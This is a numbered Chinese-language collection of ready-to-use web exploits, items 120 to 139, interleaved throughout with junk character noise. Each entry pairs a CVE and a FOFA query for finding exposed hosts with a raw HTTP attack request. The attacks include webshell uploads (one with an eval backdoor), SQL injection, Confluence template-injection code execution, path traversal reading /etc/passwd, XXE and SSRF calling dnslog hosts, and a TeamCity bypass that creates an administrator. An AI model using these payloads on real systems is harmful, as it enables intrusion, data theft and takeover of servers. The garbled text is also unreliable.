src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
2 O! w% y( Q4 b; T! F* B( C7 b" i; O: \ U1 ^! V
$ V) \# X6 v4 j; w$ W- O' j4 l
120. 北京百绰智能S40管理平台导入web.php任意文件上传
- u; I, ]( B4 R2 N! X$ NCVE-2024-1253
) j* `! A) T+ f; |FOFA:title="Smart管理平台"( k" ?" m- y% z* X/ l* x
POST /useratte/web.php? HTTP/1.10 \$ g! Q3 H: X
Host: ip:port; k$ U* L/ e4 O% v# h* }- R
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db( q7 A9 K/ K1 H4 U+ Q# R
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko0 d4 _# Z- ~' j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) g; B$ b2 D( ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 [2 X" W% t/ F4 u* V1 XAccept-Encoding: gzip, deflate3 N& g+ q6 z9 c3 g9 i
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793287 n" }0 m" V# Q
Content-Length: 597. c: Z {2 l! c; `2 [4 B+ D. P
Origin: https://ip:port
) J' H+ _% J3 MReferer: https://ip:port/sysmanage/licence.php3 E! y3 w2 f! s$ {9 O+ |3 D; F
Upgrade-Insecure-Requests: 1- t: J; l" f, H2 q& p ^
Sec-Fetch-Dest: document
- q. r# @, V3 v G: J: NSec-Fetch-Mode: navigate
* B4 a: P4 d8 v' A! L+ rSec-Fetch-Site: same-origin9 v8 L7 @( g+ k c8 Q0 S
Sec-Fetch-User: ?1' y1 E; N6 W0 J; x
Te: trailers( \7 J9 I7 \3 c' ]9 n6 `
Connection: close2 b$ z* R' \* M1 w( a5 ^0 f
$ e+ n5 E, Q+ p% K7 M
-----------------------------42328904123665875270630079328
8 s7 w, M& X' ]1 F kContent-Disposition: form-data; name="file_upload"; filename="2.php"
) z7 g9 X4 e t4 B' g& qContent-Type: application/octet-stream
* S3 O! d3 J5 ~6 v1 \7 l% }/ N* s& y, V- G9 \+ o4 @
<?php phpinfo()?>
/ N- i5 {$ ]8 G1 z* k0 B' [-----------------------------42328904123665875270630079328
j. _/ O5 J* @0 eContent-Disposition: form-data; name="id_type"5 W0 w/ B: [; L$ E) T* n
& C- W/ x, [% d3 i( Y; i9 U
1$ c- m0 P( {" T% t
-----------------------------42328904123665875270630079328
3 m% T1 S; K! n) h# g1 NContent-Disposition: form-data; name="1_ck"
2 g) \9 h& B: K
: G1 Z) a2 f% ?2 E1_radhttp. o! k) ]! |) Q0 d* T" g
-----------------------------42328904123665875270630079328
8 V, p& Q" u. h6 WContent-Disposition: form-data; name="mode"* a1 j. V+ N6 o
3 k3 l, ^& K1 x; c
import( y' w: D' B' ?- ?5 l+ e) H3 \+ e$ k- ]
-----------------------------42328904123665875270630079328
. l* w# F: |) i/ i
* D0 S( r+ K& `; _% ]8 Z0 Y9 O8 t+ b5 J% P
文件路径/upload/2.php
$ ^; Q- \9 e `& Z" S. C( V( Z' J
1 U) K- @$ o% A/ p121. 北京百绰智能S42管理平台userattestation.php任意文件上传4 Z0 e" ^5 d+ l V6 G3 f1 _% [
CVE-2024-1918
. a% x8 I$ }4 S% [. sFOFA:title="Smart管理平台"* B2 I0 k: c5 |; v6 D/ i, w. M
POST /useratte/userattestation.php HTTP/1.1
* ]+ L" Y- c5 D+ u* P0 y' BHost: 192.168.40.130:8443" m5 m" W( W- O
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
; {0 `- }8 s1 O6 R% J& JUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko5 A. \# {$ G0 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' s$ B5 [, |, t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 s* }" o1 w! w
Accept-Encoding: gzip, deflate0 b) g; D5 h7 w" O: k' X3 A% }. A. o) L
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
: ]" h; |9 s/ I/ sContent-Length: 592; r% j' \, e5 @1 E; D4 ^0 F- ?
Origin: https://192.168.40.130:8443
( H _0 f p7 Y1 y# {Upgrade-Insecure-Requests: 1
2 ~+ a$ u$ t# l p; }; ]5 S% H3 VSec-Fetch-Dest: document; i) o0 v& R$ h. h
Sec-Fetch-Mode: navigate
8 j# q3 {. T! e1 D4 F2 H- t7 VSec-Fetch-Site: same-origin4 E0 x" W% g+ |
Sec-Fetch-User: ?1
+ N5 _% S8 v$ M+ |- CTe: trailers f( a# G6 ^& _
Connection: close
, Q- i6 G6 f% ? X {$ t& M' V- q% U% v6 a
-----------------------------42328904123665875270630079328
% G1 Y) R1 c9 |9 t4 kContent-Disposition: form-data; name="web_img"; filename="1.php") r5 c3 [% n0 W5 o
Content-Type: application/octet-stream
9 ?) u4 ]4 {8 g: K
; K6 x, Z$ E& [* n+ K<?php phpinfo();?>
+ e/ p- P& }" w: Z-----------------------------42328904123665875270630079328
' X. c+ X* _7 D/ ]6 MContent-Disposition: form-data; name="id_type"
& F3 d- G! @" ]% q, f) H6 `
& m* j! w7 X+ s2 s1
) X9 A) X \& s-----------------------------42328904123665875270630079328& z+ P% a& `1 @- J) n5 s
Content-Disposition: form-data; name="1_ck"
7 r6 g; r, n: l1 }* `, k7 t
6 B) m. `/ B- f! s& ]; [1_radhttp
5 j2 `9 s$ V* Q% {2 @' C# ^-----------------------------42328904123665875270630079328
- X0 V3 p& T# s9 gContent-Disposition: form-data; name="hidwel"
. t- U! \( ~8 ]+ }& @" D
3 W: k& F$ X; Uset! S0 S% I B# D A0 c/ E. D- r, Z' k
-----------------------------42328904123665875270630079328
3 U: J* d# d* W; r0 w! R& J1 ?, n
8 h( C+ \+ m; U, rboot/web/upload/weblogo/1.php
1 R+ H5 g# E+ h2 h( x5 `) d: O- U2 ^; B1 v/ u7 {' [' \
122. 北京百绰智能s200管理平台/importexport.php sql注入- B0 D+ V1 d1 z# l7 x
CVE-2024-27718FOFA:title="Smart管理平台"5 z0 _' E, E ]0 I/ ?# V
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
/ J& L$ k) B3 c8 d* _GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
5 X! [0 h( ~, K$ uHost: x.x.x.x3 r0 @% j$ G- T/ D+ ~
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
/ f. j& X0 l8 ?* z+ z9 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 `' l. k9 v, @! M# J+ |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: H6 E% j, u) Z0 \9 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 H& I, h) S& _* M4 n! e; x, GAccept-Encoding: gzip, deflate, br/ j, w1 x2 f4 o. y& ~* ^# {0 o4 F
Upgrade-Insecure-Requests: 1' ^/ s# h, ~1 l ~" s
Sec-Fetch-Dest: document
+ X4 m% r- g) R/ q S" u% bSec-Fetch-Mode: navigate
' j, J% M4 f) R5 C3 i' p; ySec-Fetch-Site: none& U& [4 W7 N! H; k9 m8 x# f: t, H
Sec-Fetch-User: ?1
5 q7 {* u5 H8 o6 a& b2 DTe: trailers
" i3 k: p' \6 D/ OConnection: close* |4 Q/ ]- s9 ^$ W+ H9 M
: n+ Q7 s* K" W Y( ]9 q& z* B5 _/ j0 F# I
123. Atlassian Confluence 模板注入代码执行+ C; i- p! x4 }7 e4 U, [
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
( V4 r6 c# ^7 ^6 X l- SPOST /template/aui/text-inline.vm HTTP/1.14 M. x. W7 W: z+ r s! i
Host: localhost:8090
" _5 S" L! }% ~6 t: f+ v# dAccept-Encoding: gzip, deflate, br1 Q; t) X/ {# M# K
Accept: */*' O. e! g3 i n6 g2 H
Accept-Language: en-US;q=0.9,en;q=0.8
: T# ?0 n& |; N7 M ]9 T, wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
& z0 d. M# Q6 VConnection: close
. W6 t& H+ \0 nContent-Type: application/x-www-form-urlencoded
9 [# M( t7 w, H$ K9 _% B
1 q( q4 a9 P# J8 L1 L* S4 e, nlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
$ u, @% z" S- B/ E/ I2 \3 T- _1 L& h% X$ n7 q
% V5 g6 G. a" B1 e- O
124. 湖南建研工程质量检测系统任意文件上传
3 m4 O, X9 w# l" B. DFOFA:body="/Content/Theme/Standard/webSite/login.css"
8 o& k0 p# ^; s' N3 pPOST /Scripts/admintool?type=updatefile HTTP/1.1( m# {5 Z2 |7 \& ~+ H* W6 f7 s7 I
Host: 192.168.40.130:82829 n& s4 I; ]. Q4 o
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
0 u, i6 h) x* i( U! @+ WContent-Length: 72- U& a. i" c6 \6 G7 W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
5 Y# d7 x& K2 R# @Accept-Encoding: gzip, deflate, br
* W2 M! \0 T9 p5 {; u8 U: C3 _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 ~ S* s/ J/ K+ a; q9 F1 J8 V
Connection: close4 t6 N! q3 c" q
Content-Type: application/x-www-form-urlencoded' a M3 A7 }8 i$ s$ z# `
* q( M; h* }0 K3 rfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>6 o$ |5 r6 c" M* ~! }6 E
- m2 p; m$ B9 H0 l- r1 h3 l% Q; V% \1 E" K/ Q6 e& R
http://192.168.40.130:8282/Scripts/abcgcg.aspx, r8 I3 w- G9 F# I
4 h5 u l9 b+ A& M) @125. ConnectWise ScreenConnect身份验证绕过4 ? e: N, s8 y8 n {4 }/ U
CVE-2024-1709" C# _* g( L9 F" j6 k0 _; b) B4 G+ H- R
FOFA:icon_hash="-82958153"
- \4 |* y* Z+ e. [3 Khttps://github.com/watchtowrlabs ... bypass-add-user-poc3 a9 @) h9 S; }% T/ a% h
( {3 l6 S3 T: a, S3 e7 B- g. S8 a5 U$ }4 z. k
使用方法
( ~9 |+ X7 J' K0 n+ |python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!1 j" ~5 w8 n0 K3 V: Q, }
; `+ p2 Z! A; k r/ ^
" G* _. I% X2 X0 T( l
创建好用户后直接登录后台,可以执行系统命令。7 C V5 p/ P8 x( [+ Z; U5 R
0 B, _; ~; R# i2 U. K* ~
126. Aiohttp 路径遍历0 E8 V+ Q; r8 H
FOFA:title=="ComfyUI"
$ h: }( }! }9 h0 ^GET /static/../../../../../etc/passwd HTTP/1.18 a& L% m, u2 ~) x5 Z$ A% b
Host: x.x.x.x9 B1 f0 o4 y4 D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
$ H: w8 ^$ K! R# @. c; g1 DConnection: close
3 ^; T* e" Q' s2 Y9 eAccept: */*& r/ P5 k% I- E( t: v6 X
Accept-Language: en% ]4 y1 @" s$ O& o
Accept-Encoding: gzip' W' r2 n& @8 q4 H6 H. a% o$ X' S
' i2 h7 w& u9 b
# A) x2 U! `# C* Q. r; F. n: p127. 广联达Linkworks DataExchange.ashx XXE
8 I: N \) d% F$ q3 ^) c( u; aFOFA:body="Services/Identification/login.ashx" % T6 A" W, t v3 _1 | n8 @
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
! _' _- R2 t9 AHost: 192.168.40.130:8888& M5 q5 d K5 F. ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36, P3 k( D+ B* o6 U9 b d
Content-Length: 415
I9 y r* j; F5 g5 \3 F% L# EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! o* o) l3 u1 D8 k: H* m1 IAccept-Encoding: gzip, deflate
& j$ x; K8 Z+ k' x% F3 HAccept-Language: zh-CN,zh;q=0.9: y+ N2 x1 D9 B0 s
Connection: close
( M G' G8 F5 J6 \Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0: x: j2 t; M/ S# J' r
Purpose: prefetch
1 f% l0 @- x5 Q5 SSec-Purpose: prefetch;prerender
- w8 X' k' E! j0 G% Y3 n. ^1 L& @$ r
------WebKitFormBoundaryJGgV5l5ta05yAIe0% Z" v$ h6 p0 ?7 N6 O+ m8 d. v/ @, b
Content-Disposition: form-data;name="SystemName"
- Z5 L7 t, Q* Q2 A, a" s7 W4 G) F" `% l* Y; X& h
BIM
, _# W. Y% x B, d------WebKitFormBoundaryJGgV5l5ta05yAIe0- y5 @7 S* r/ d/ b
Content-Disposition: form-data;name="Params"
" h$ L+ g! J- A' s+ ^. YContent-Type: text/plain4 V( S* b- L8 Y" b2 Y9 C& k
- J7 I2 f% h, h$ h4 [/ e<?xml version="1.0" encoding="UTF-8"?>; v$ `7 W9 N& C4 ?8 E3 o9 X
<!DOCTYPE test [
5 W3 Q) l# F) |9 U" G: {7 v. V<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">- L& \8 R# S% m
]/ s$ b0 V; E8 F2 t' `9 Q
>) R$ u; W; X* q2 b2 }/ ]3 F/ g
<test>&t;</test>
) Z* \6 ?" h3 ^% |4 X0 S: p9 M------WebKitFormBoundaryJGgV5l5ta05yAIe0--
) d( e3 t/ w7 H" _2 d
M% |/ N5 B/ x% \; H {# c+ j' z1 l0 p( f: h5 w! ^9 S5 e0 Z
! f* @* x w1 B; y( M7 s- l128. Adobe ColdFusion 反序列化
& U) c, ]) e5 T: _. Q) rCVE-2023-38203* l" v+ b% S. v# j) f7 g5 v3 c
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
9 [# o! t/ F' h& u( c+ j, pFOFA:app="Adobe-ColdFusion"1 o- m/ j6 r2 \% ^
PAYLOAD
0 t1 Y0 z* q" O3 W& e
8 W9 @+ z' O: _2 ?) U129. Adobe ColdFusion 任意文件读取4 a4 S) T! }' W, H! z! `( e
CVE-2024-20767
; ~" ^ b8 Y2 j: ?+ g$ [8 FFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"+ g' R' N& G$ d4 l$ `
第一步,获取uuid
8 h4 J+ Z5 X( u" _( yGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1- I# S1 A6 L) F6 j$ ~! b
Host: x.x.x.x! r! @7 t9 W6 J) @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36; T; j8 a8 y L( K' v" W5 R
Accept: */*
g! a- T3 j3 w1 q, kAccept-Encoding: gzip, deflate
, R' a; g& L. ?Connection: close
$ a& M: d4 `8 Q5 b: w( n5 e, h: }
- Y5 G6 }9 h0 L& a8 g6 }$ o {% F7 G6 Y. E0 s& n( p. h
第二步,读取/etc/passwd文件8 X5 U3 N$ n" u) C" d& Y% X2 H7 I
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1/ Z# A+ Y* A! ~
Host: x.x.x.x
0 `; S3 N! l; D1 }2 [; Z$ PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+ |1 n+ l/ r! Q, z# N# Y: u; a) hAccept: */*+ G8 h! i' f2 d0 R
Accept-Encoding: gzip, deflate
/ {$ X% H5 N! ~" O6 p3 N; L. I0 o% HConnection: close
) O; _4 {9 Q+ e, E: ?( H2 Duuid: 85f60018-a654-4410-a783-f81cbd5000b9! e7 H; a$ q; Q9 n) ]
6 I# Y& E( X; ]. J6 t5 x3 E ~
% u" P' Q5 I7 u" v% u130. Laykefu客服系统任意文件上传
. C2 U& z2 B: d6 ?5 x# v5 j- |! V0 JFOFA:icon_hash="-334624619"3 u# W$ c$ [8 C5 x+ e5 }# o7 U
POST /admin/users/upavatar.html HTTP/1.19 z8 h! _7 P" q% P; B K
Host: 127.0.0.1
2 W- S6 S' _8 J9 ^7 C1 o) }- h; UAccept: application/json, text/javascript, */*; q=0.01
) A. k; `0 D; ~5 R: g. OX-Requested-With: XMLHttpRequest
# T4 O+ @/ N3 Q$ i IUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
3 C' Z ^+ ]) mContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
# F, _4 {+ h- J9 A1 P5 z) WAccept-Encoding: gzip, deflate! d5 @( M6 g$ J3 o1 d
Accept-Language: zh-CN,zh;q=0.9
3 ^) V% V# p( j& [" c: E& ]# LCookie: user_name=1; user_id=3
- A) v* J% B, U, C- C' o1 RConnection: close: y' v! R7 A0 f1 N1 P
+ e2 n I4 |1 x$ r------WebKitFormBoundary3OCVBiwBVsNuB2kR
8 O+ Y$ B) ^! ^ [+ V. ]9 E& N0 pContent-Disposition: form-data; name="file"; filename="1.php"
' o- U8 ?; u+ o8 v {( ~6 nContent-Type: image/png+ ~# Z0 M& p% i
1 }3 d9 s1 S0 a E<?php phpinfo();@eval($_POST['sec']);?>
! k. D. v: h1 A8 ?; w8 G------WebKitFormBoundary3OCVBiwBVsNuB2kR--
& }+ D$ ^6 h3 f) Y8 [/ b% m+ F% y. c& b$ s8 b% f
7 U$ v1 u% p- y& z' p
131. Mini-Tmall <=20231017 SQL注入# l/ X7 B. }. K7 O8 M
FOFA:icon_hash="-2087517259"' {/ G0 u; R& t; f8 k' N- H& [# L
后台地址:http://localhost:8080/tmall/admin
. P* `: j) j8 xhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)- r8 l2 R, E# Q( G! A" r/ S1 A% @7 P
& f& T$ o: [* m. D% K3 ?
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过# K6 M+ m! W/ r$ x2 g, ]/ h
CVE-2024-27198& P, z- x) S: P0 ~
FOFA:body="Log in to TeamCity"
9 F* k: x" C, e2 r, U0 E1 qPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1. Z) H L( K8 M" B1 @1 h
Host: 192.168.40.130:8111
6 M5 b) t- \! |% x7 t8 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
9 F. U( X0 \; EAccept: */*1 j$ ^8 s3 S0 Z3 A& V* j
Content-Type: application/json
* p4 C# I; t0 b4 j- \, ?" O* e7 L9 I( t: g/ NAccept-Encoding: gzip, deflate
7 X5 g) r/ v4 z% H2 j1 `- Y5 m- |0 {5 s8 Q; y% {% w4 h) w
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
$ n( \7 | G0 ~' e+ y
3 z1 Z; B( N1 X" b$ q
1 ^) z( H' g: S1 q, z2 J" z% E, OCVE-2024-27199
`3 @, b* i ]) q- o1 |/ C: }/res/../admin/diagnostic.jsp
; S1 M8 [% Q" _) [/.well-known/acme-challenge/../../admin/diagnostic.jsp
6 ^7 I* | u! B. l* L. Y9 D# Q/update/../admin/diagnostic.jsp
- q, b$ u3 d: x' Q, m6 H. j: m# x# o1 f/ z
8 n7 W- V, Q, T9 W3 Q+ p& TCVE-2024-27198-RCE.py& U* t; ?% R2 F+ V
3 T) I; I% Y' Y4 U" Z133. H5 云商城 file.php 文件上传( x v# S& j- b$ ^( L3 a% K. b
FOFA:body="/public/qbsp.php"
: _+ [' K# D( h7 fPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
# E) j$ _$ i W1 ?Host: your-ip
! |# X$ S" ]8 y! v. M. xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
0 p) Y" g% k# ]8 K; ?Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
4 h! I4 f- \+ ?" c
- F% \7 P1 }# V& ]& {# F------WebKitFormBoundaryFQqYtrIWb8iBxUCx
4 Z) U: n$ N$ B( C6 Q+ v; p$ IContent-Disposition: form-data; name="file"; filename="rce.php"/ ~' _. R* T9 Z/ q. }" @$ v \
Content-Type: application/octet-stream
1 h" C v+ q" Y# C5 i/ H ( U2 C7 D# z. p3 z4 z1 i! E
<?php system("cat /etc/passwd");unlink(__FILE__);?>: Y: }' l6 T* j/ z
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--7 A0 g( @' \6 x) n! w9 _
x& N+ H4 R6 y F- F$ e8 \: \. l' u$ u! [& z* c1 r
! \( l6 v5 s3 _ G6 d! c
134. 网康NS-ASG应用安全网关index.php sql注入5 `% K$ q+ r: T
CVE-2024-2330
- P* E3 D- s0 o0 F0 K, kNetentsec NS-ASG Application Security Gateway 6.3版本( D5 z5 m/ }$ u: y+ I
FOFA:app="网康科技-NS-ASG安全网关"
9 F. g, R/ D5 yPOST /protocol/index.php HTTP/1.1% ~& O/ Z7 N" L$ y
Host: x.x.x.x, J4 t* a% F: b% |- `
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
2 Z' ?0 F8 l$ q R: {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
3 g) n6 T2 p9 _- \/ i/ @; F% tAccept: */*1 {5 f5 ?- E; m" ~) m" K8 Y+ s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! X0 L" r1 Z4 H$ q1 r$ A; \* n9 c. u
Accept-Encoding: gzip, deflate
. O6 J8 y, N7 u; s& r5 f7 ~Sec-Fetch-Dest: empty
8 |/ h" v$ O7 m3 |Sec-Fetch-Mode: cors3 C9 [3 I4 J& g5 {" e1 p6 @. W
Sec-Fetch-Site: same-origin
( {! k" ^+ F. n' a+ jTe: trailers! z% T8 Z6 [- ^& e1 C
Connection: close' b% x f$ @9 o( W9 g
Content-Type: application/x-www-form-urlencoded/ I. s# P8 e6 j3 p% K6 S1 S
Content-Length: 263( @4 o: v8 |+ {) p+ W$ ]
- N6 U' T# U" o0 [6 _: tjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
3 S$ B2 o; k/ D, a. |
" ?# @6 a7 m# L! M/ w( O" v t3 x" D0 M( G J# z5 @; [) d
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入 }. _ ?! P5 L! x. ~* r Q
CVE-2024-2022
7 ~8 Z8 E# \; H% r } Y( i6 k. ^Netentsec NS-ASG Application Security Gateway 6.3版本+ `, U2 N$ M& r2 V# o
FOFA:app="网康科技-NS-ASG安全网关": f3 D# {3 V2 P
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.15 @- f y9 }0 G" C$ v; @
Host: x.x.x.x
& g1 p: J& m3 e& y( | u- v' WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 [+ v& Z" ?7 s$ GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. _9 U" n+ h' l0 Q
Accept-Encoding: gzip, deflate; [+ \- {; @8 t+ ^+ a9 T
Accept-Language: zh-CN,zh;q=0.9
7 b. ? V% V! NConnection: close) g9 ~+ J/ F& s/ R0 x. `
+ \0 S2 I- d$ `. g; {" m- @) p; i. ?0 j$ S
136. NextChat cors SSRF, y3 p7 c1 j2 _# d' y
CVE-2023-49785( n, D7 `6 C; ]- V7 O
FOFA:title="NextChat"
7 O9 `5 @) [; M5 W' G D- IGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
" F0 _" {2 i% U: aHost: x.x.x.x:10000
7 H8 {4 ~, u7 M% L/ nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- w; e9 F$ J+ v
Connection: close1 e7 ~* L$ d! k" f& `8 M- B6 d
Accept: */*
" x ^" H& F2 t; l2 jAccept-Language: en
0 A7 J. N: ]2 }+ j! v5 a4 K1 IAccept-Encoding: gzip
6 {. x5 @ r, _# |' A
2 \, |/ G$ V) s0 g7 T) c, A. ? P* N5 D8 p/ l
137. 福建科立迅通信指挥调度平台down_file.php sql注入8 G5 ^# ^$ b2 m P
CVE-2024-2620
4 r5 j6 j( g! JFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"3 W k: ?$ T& l! p% C
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1) |) N+ ~# e# d- d' S
Host: x.x.x.x
# C7 u0 R5 ]) J5 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
5 @+ Y/ R/ y- B v" F. DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 h) Z% ^- a; c/ F6 c# a0 J, _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 W. r- F* [% u( u/ F
Accept-Encoding: gzip, deflate, br
$ m0 l0 P/ B( K! [1 Z7 m: @Connection: close( q- i [8 C2 \! q# P; l. S, y1 L2 S
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
) ?2 u5 _+ C7 `Upgrade-Insecure-Requests: 1; W, b' r. r, g% A. }
0 I$ w6 d! m1 D6 K6 ^+ |7 k0 s% J/ W( P+ ?5 b0 k; [2 u3 ?
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
, d1 U3 p e! g2 x8 H$ A* i# {CVE-2024-26217 P) Z% }7 X) b
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台" [3 ?# W8 Q8 P% R8 O
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
: n1 o8 n9 j# PHost: x.x.x.x
$ ]& Y; M& K H- f2 A5 t0 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 Z9 w9 Y7 x) `; L& j8 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" U8 w3 K; I8 y) Z1 z: z* g, cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 k( B/ q- m9 r* PAccept-Encoding: gzip, deflate, br; L% l" C% e% W2 Q8 L$ A( f# A
Connection: close
' i& w$ Q3 Z) w7 p- r6 U. m7 i; ~Upgrade-Insecure-Requests: 12 d2 b1 }; k/ T2 K% e" x
y: k' e" [6 _- T6 c% m* ?, P8 z# e s+ [! ~
139. 福建科立讯通信指挥调度平台editemedia.php sql注入. u3 a( K& D& d7 K, p/ S$ S |
CVE-2024-2622) }% o' J$ Y) w- P3 J5 Y9 ?+ A
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
* d% y. ?& }9 w0 W9 Z _1 RGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.11 O7 |# e' Q( ] o9 C
Host: x.x.x.x
